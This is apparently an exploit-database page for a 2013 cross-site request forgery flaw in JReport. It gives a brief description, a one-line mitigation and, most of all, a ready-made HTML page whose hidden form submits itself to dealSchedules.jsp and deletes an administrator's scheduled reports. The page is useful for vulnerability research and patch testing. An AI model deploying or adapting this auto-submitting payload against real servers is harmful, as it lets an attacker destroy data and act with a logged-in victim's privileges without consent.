header-logo
Suggest Exploit
vendor:
JReport
by:
SecurityFocus
3,1
CVSS
MEDIUM
Cross-Site Request-Forgery
352
CWE
Product Name: JReport
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2013

JReport Cross-Site Request-Forgery Vulnerability

JReport is prone to a cross-site request-forgery vulnerability. Exploiting this issue may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks. An attacker can craft a malicious HTML page that contains a form with hidden fields and submit it to the vulnerable application. The application will then process the request as if it were submitted by a legitimate user.

Mitigation:

To mitigate this issue, the application should implement a strict policy that requires users to re-authenticate before performing any sensitive actions.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/63363/info

JReport is prone to a cross-site request-forgery vulnerability.

Exploiting this issue may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks. 

<html>
<body>
<form name="foo" action="https://www.example.com/jreport/jinfonet/dealSchedules.jsp"method="post">
<input type=hidden name="d1" value="2013-08-03%252014%253a20%253a41.29">
<input type=hidden name="cmd" value="cmd_delete_schedules">
<input type=hidden name="taskClass" value="APIDemoDynamicExportTask">
<input type=hidden name="taskUrl" value="schedulePage.jsp%3Fjrs.cmd%3Djrs.get_edit_schd_page%26jrs.task_id%3D2013-08-03%252014%253a20%253a41.29%26jrs.catalog%3D%252fSecurity%252fSecurity.cat%26jrs.report%3D%252fSecurity%252fBank_User%2520Activation.cls%26jrs.path%3D%2FUSERFOLDERPATH%2Fadmin">
<input type=hidden name="jrs.path" value="%2FUSERFOLDERPATH%2Fadmin">
</form>
<script>
document.foo.submit();
</script>
</body>
</html>

Navigation

Suggest Exploit

Services By CQR